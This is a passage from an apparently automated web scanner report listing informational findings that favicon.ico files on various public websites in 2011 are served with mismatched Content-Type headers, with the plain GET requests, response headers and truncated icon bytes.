Content-Type: text/plain; charset=UTF-8

.PNG
.
...IHDR...............h6....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<...-IDATx.b|........E.8...........#..~..ZW..Z.........\....X5....0...|.P....o.?....SR.....o.a...@..........:.e...{
...[SNIP]...

27.124. http://www.lowfares.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.lowfares.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lowfares.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:40 GMT
Server: Apache/2.0.52 (CentOS)
Last-Modified: Mon, 14 May 2007 19:40:49 GMT
ETag: "556-430734b449240"
Accept-Ranges: bytes
Content-Length: 1366
P3P: policyref="/static/policy.xml", CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding

..............@.......(........................................p..............o...E.......@...........k.......'...........0.......f...........6..............[.......P.......Q...................p.....
...[SNIP]...

27.125. http://www.lunka.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.lunka.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=Windows-1251

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lunka.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 13:52:02 GMT
Content-Type: text/plain; charset=Windows-1251
Connection: keep-alive
Last-Modified: Thu, 18 Nov 2010 08:28:30 GMT
ETag: "375df19-57e-4954f931dc780"
Accept-Ranges: bytes
Content-Length: 1406

..............h.......(....... .......................................aa..44......OO..........TT..........##..kk..""..\\..........QQ......................,,..............mm......11......SS............
...[SNIP]...

27.126. http://www.mac.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mac.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a PNG image.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mac.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 1064
Content-Type: text/plain
Server: Apache/1.3.33 (Darwin)
Last-Modified: Tue, 14 Jan 2003 23:08:49 GMT
ETag: "5c2a3fb-428-3e249881"
Date: Sat, 02 Apr 2011 13:40:47 GMT
Connection: close

.PNG
.
...IHDR.............h.......gAMA.....OX2....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b...?........X..?@.1.D....o...........i.x.H23.<q.. .X@..8....X.._=...@p=0..@.,<.OjV..........l.....q....
...[SNIP]...

27.127. http://www.maniatv.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.maniatv.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.maniatv.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:40:54 GMT
Server: Apache/2.2.8 (Fedora)
Content-Length: 45
Connection: close
Content-Type: text/html; charset=iso-8859-1

The requested file favicon.ico was not found.

27.128. http://www.mediaite.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mediaite.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mediaite.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:18:47 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 26 Mar 2010 19:48:19 GMT
ETag: "1b82e3-47e-482b971f0a6c0"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .........................................................................................................................................................NQ......46
...[SNIP]...

27.129. http://www.medicalnewstoday.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.medicalnewstoday.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=ISO-8859-1

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.medicalnewstoday.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:13:22 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Sat, 24 Feb 2007 01:52:49 GMT
ETag: "43000e-e36-2a56be40"
Accept-Ranges: bytes
Content-Length: 3638
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

..............h...&... ..............(....... ...........@................................_O.........LWL..........;1.....1|v...~..*......p....g^..C0.....2............RH..vk.....VC7.Oma.....l...}0....
...[SNIP]...

27.130. http://www.mercurynews.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mercurynews.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mercurynews.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 02 Apr 2011 13:37:38 GMT
Content-Length: 15
Connection: close

File not found.

27.131. http://www.michigan.gov/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.michigan.gov
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.michigan.gov
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:47 GMT
Server: IBM_HTTP_Server
Last-Modified: Sat, 11 Dec 2004 22:27:07 GMT
ETag: "1426-57e-924944c0"
Accept-Ranges: bytes
Content-Length: 1406
Cache-Control: public, max-age=86400
Content-Type: text/plain

..............h.......(....... ................................................x...Z...<..........................o.o.W.W.@.@..................w...Z...=... ..........s...d...U...F.o.7.W.(.@...........
...[SNIP]...

27.132. http://www.military.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.military.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.military.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:48 GMT
Server: Apache
Cache-Control: max-age=6000
Expires: Sat, 02 Apr 2011 15:03:48 GMT
Last-Modified: Mon, 29 Mar 2010 19:03:32 GMT
ETag: "1801bda-57e-4bb0f984"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: text/plain

..............h.......(....... ................................XE..WH..WH..l_..WH..yl..............nb..nb..........o`..........eS...w...z..........XG......XG..XG...x.......x......YE......XH......YE...
...[SNIP]...

27.133. http://www.miniclip.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.miniclip.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.miniclip.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Fri, 07 Jul 2006 15:11:37 GMT
ETag: "117c-3aee-417ff47e2fc40"
Content-Type: text/plain; charset=UTF-8
X-Cacheable: YES
Content-Length: 15086
Date: Sat, 02 Apr 2011 13:25:38 GMT
X-Varnish: 449801634 449792927
Age: 451
Via: 1.1 varnish
Connection: keep-alive
X-Served-By: webftl06
X-Cache: HIT
X-Cache-Hits: 31

............ .h...6... .... .........00.... ..%..F...(....... ..... .....@.............................................................................................................................
...[SNIP]...

27.134. http://www.mlive.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mlive.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mlive.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 01 May 2003 16:59:46 GMT
ETag: "1b9337-57e-3bc9d39382480"
Accept-Ranges: bytes
Content-Length: 1406
P3P: CP='CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi SAMo OTRo BUS IND PHY ONL UNI COM NAV INT DEM'
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=1
Expires: Sat, 02 Apr 2011 14:00:26 GMT
Date: Sat, 02 Apr 2011 14:00:25 GMT
Connection: close

..............h.......(....... ...........@............................3...........x..#.......i....O<..lb.>...........M..."....fu.J|....................................................................
...[SNIP]...

27.135. http://www.mochila.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mochila.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mochila.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:45:10 GMT
Accept-Ranges: bytes
ETag: "541e6-1536-47c73e224fa00"
Connection: Keep-Alive
Last-Modified: Wed, 06 Jan 2010 00:17:44 GMT
Content-Length: 5430

............ .h...&... .... .........(....... ..... ......................................................................................................i...n..................(((.;;;...............
...[SNIP]...

27.136. http://www.music-oasis.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.music-oasis.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.music-oasis.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:45:38 GMT
Content-Length: 103

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

27.137. http://www.musiciansfriend.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.musiciansfriend.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.musiciansfriend.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server:
Last-Modified: Fri, 15 Jan 2010 23:11:32 GMT
Accept-Ranges: bytes
Content-Length: 1406
X-Cnection: close
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=269732
Expires: Tue, 05 Apr 2011 16:35:34 GMT
Date: Sat, 02 Apr 2011 13:40:02 GMT
Connection: close
Set-Cookie: AKA-SESSION=35ce8f185c5000003227974d69c20a00849f0000; path=/; domain=musiciansfriend.com
Set-Cookie: OMTR-AKAID=35ce8f185c5000003227974d69c20a00859f0000; expires=Sun, 06-Mar-2016 13:40:02 GMT; path=/; domain=musiciansfriend.com
Set-Cookie: AKA-SESSION-5D=35ce8f185c5000003227974d69c20a00869f0000; expires=Thu, 07-Apr-2011 13:40:02 GMT; path=/; domain=musiciansfriend.com

..............h.......(....... ...................................T...W.....W."?x.....;...p...[}..;.......0i..^...cf..S...-W...7o.AV....V.y...6As.8q...9r.,^..........X...?Fv.,O..Z...\...3q..m...Y.....
...[SNIP]...

27.138. http://www.myheritage.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.myheritage.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.myheritage.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS) PHP/5.2.9 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Sun, 06 Nov 2005 17:24:54 GMT
ETag: "8c857f-57e-d11b6580"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:41:03 GMT
Connection: close

..............h.......(....... ...........@.......................................................r...D...Q... .~...~...z.E...P...P...;...C...9.....}...}.&.N.'.H.!.}...~.).z.[...(...W...*...P.....~.#.
...[SNIP]...

27.139. http://www.mylifetime.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mylifetime.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mylifetime.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 08 Jul 2009 07:10:20 GMT
ETag: "104d04c49-1536-46e2c6e994f00"
RealServer: prodweb8
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=80968
Expires: Sun, 03 Apr 2011 12:04:47 GMT
Date: Sat, 02 Apr 2011 13:35:19 GMT
Content-Length: 5430
Connection: close

............ .h...&... .... .........(....... ..... .........................U%..T&..S%..S&..T'..S%..U$..V(..U'..U%..S&..T&..T&..S%..T&..S&..S'..T(..S%..............^6..S'..^2..^3..V(..U&..U&..V&..U%
...[SNIP]...

27.140. http://www.mylocalemployment.net/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mylocalemployment.net
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mylocalemployment.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/plain; charset=UTF-8
P3P: CP="IDC CON TEL CUR DEV SAM IND"
Date: Sat, 02 Apr 2011 13:56:30 GMT
Accept-Ranges: bytes
ETag: "2ef4d3-47e-48c12aa1a6880"
Connection: Keep-Alive
Last-Modified: Fri, 23 Jul 2010 19:01:38 GMT
Content-Length: 1150

............ .h.......(....... ..... ...............................x...r...k...h...h...f...e...e...e...e...e...e...e...e.Gl.......x...o..g..d..d..a..^..^..^.._.._.._.._..`.F{j.....%...H.
...[SNIP]...

27.141. http://www.mystart.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mystart.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mystart.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:18 GMT
Server: Microsoft-IIS/5.0
Last-Modified: Wed, 09 Jun 2010 16:41:56 GMT
ETag: "1e15-47e-4c0fc454"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain

............ .h.......(....... ..... .....@.............................................................................................................................................................
...[SNIP]...

27.142. http://www.nationalreview.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nationalreview.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=ISO-8859-1

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nationalreview.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 18 Oct 2010 18:17:57 GMT
ETag: "29aec6-47e-492e83212bf40"
Cache-Control: max-age=604800, public
Expires: Fri, 15 Apr 2011 16:49:59 GMT
Content-Type: text/plain; charset=ISO-8859-1
X-Cacheable: YES: Cache-Control controlled
Content-Length: 1150
Date: Sat, 02 Apr 2011 13:54:06 GMT
X-Varnish: 1720311782 1718742698
Age: 75848
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Hit: HIT

............ .h.......(....... ..... ................................................................................................................~..E..s ..x$...O....~..............................
...[SNIP]...

27.143. http://www.netflix.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.netflix.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.netflix.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:42:59 GMT
Server: Apache-Coyote/1.1
Last-Modified: Thu, 24 Mar 2011 13:33:18 GMT
Content-Length: 1150
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/plain
Set-Cookie: NSC_ED2-xxx=ffffffff09cc3e9145525d5f4f58455e445a4a422d69;path=/;domain=netflix.com;httponly

............ .h.......(....... ..... .....@....................    ...    ...    ...    ...    ........d...n.............    ...    ...    ...    ...    ...    ...    ...    ...    ....[. .#. .#. .#. .#. .#. .#. .#..    ...    ...    ...    ...    ...    ...    
...[SNIP]...

27.144. http://www.newgrounds.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.newgrounds.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.newgrounds.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:23 GMT
Server: Apache/2.2.17 (Unix)
Last-Modified: Mon, 29 Oct 2007 21:37:52 GMT
ETag: "54a9ab-47e-43da883360c00"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

27.145. http://www.newsdaily7.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.newsdaily7.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.newsdaily7.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:14:46 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 02 Feb 2011 21:56:27 GMT
ETag: "668058-47e-49b53b88298c0"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

............ .h.......(....... ..... .....@....................I...I...H...H...H...G...^2..nG..nG..W'..G...H...H...H...I...K...H...9...9...9...9...8....|..........}_..8...9...9...9...8...H...F...8...8
...[SNIP]...

27.146. http://www.newsok.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.newsok.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.newsok.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 29 Jun 2010 19:32:53 GMT
ETag: "1bd070-1536-48a304daba340"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Connection: Keep-Alive
Date: Sat, 02 Apr 2011 12:52:30 GMT
Age: 195
Content-Length: 5430

............ .h...&... .... .........(....... ..... .........................333.333.333.333.333.333.333.333.333.333.333.333.333.333.333.333.333.333.333.333.333.865.OHA.ZPG.YOF.JD?.544.333.333.333.33
...[SNIP]...

27.147. http://www.nextag.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nextag.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain a GIF image.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nextag.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:11 GMT
Server: Apache-Coyote/1.1
ETag: W/"422-1300382930000"
Last-Modified: Thu, 17 Mar 2011 17:28:50 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 422
Vary: Accept-Encoding,User-Agent
X-Cnection: close

GIF89a.....?....3f........ff.........Bh.......k{..HH...Jx....No.c...)!9k................................33.1)......Z.....{...JR.11......R{........)1.............9B..........ZZs..f...Zc.....{{...RZ.)).
...[SNIP]...

27.148. http://www.northerntool.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.northerntool.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=windows-1252

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.northerntool.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
P3P: CP='NOI DSP COR NID OTPi OUR NOR'
Last-Modified: Thu, 29 Mar 2007 21:39:01 GMT
ETag: "2ab98-47e-9548a740"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=windows-1252
Date: Sat, 02 Apr 2011 13:44:46 GMT
Connection: close
Set-Cookie: stop_mobi=yes; path=/; domain=northerntool.com

............ .h.......(....... ..... .....@...................................c..&EQ.
*7.
*7.
*7.
*7.&EQ.c..............................&EQ.
*7..p...................p......&EQ.....................
*
...[SNIP]...

27.149. http://www.oodle.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.oodle.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.oodle.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private, max-age=2592000
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Expires: Fri, 11 Feb 2011 02:22:44 GMT
Content-Type: image/gif
Date: Sat, 02 Apr 2011 13:36:37 GMT
Content-Length: 1150
Connection: close

............ .h.......(....... ..... .............................................................................................................................w...>~................................
...[SNIP]...

27.150. http://www.opportunity.co/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.opportunity.co
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.opportunity.co
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:55:35 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 29 Apr 2010 14:38:22 GMT
ETag: "47b059c-47e-1413b380"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain

............ .h.......(....... ..... .............................t...t...t...t...t...t...t...t...t...t...t...t...t...t.......X...@...9~..!o..f...........9~..!o..!o..i...........9~..!o..t...X.........
...[SNIP]...

27.151. http://www.oprah.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.oprah.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.oprah.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 21 Jan 2010 20:22:10 GMT
ntCoent-Length: 1150
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Cache-Control: private, max-age=900
Date: Sat, 02 Apr 2011 13:35:56 GMT
Content-Length: 1150
Connection: close
Set-Cookie: SSLB=0; path=/; domain=.oprah.com
Set-Cookie: check_loc=US; expires=Sun, 03-Apr-2011 13:35:56 GMT; path=/

............ .h.......(....... ..... .........................C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|..C|
...[SNIP]...

27.152. http://www.orientaltrading.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.orientaltrading.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.orientaltrading.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 01 Sep 2009 21:19:53 GMT
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:42:02 GMT
Connection: close

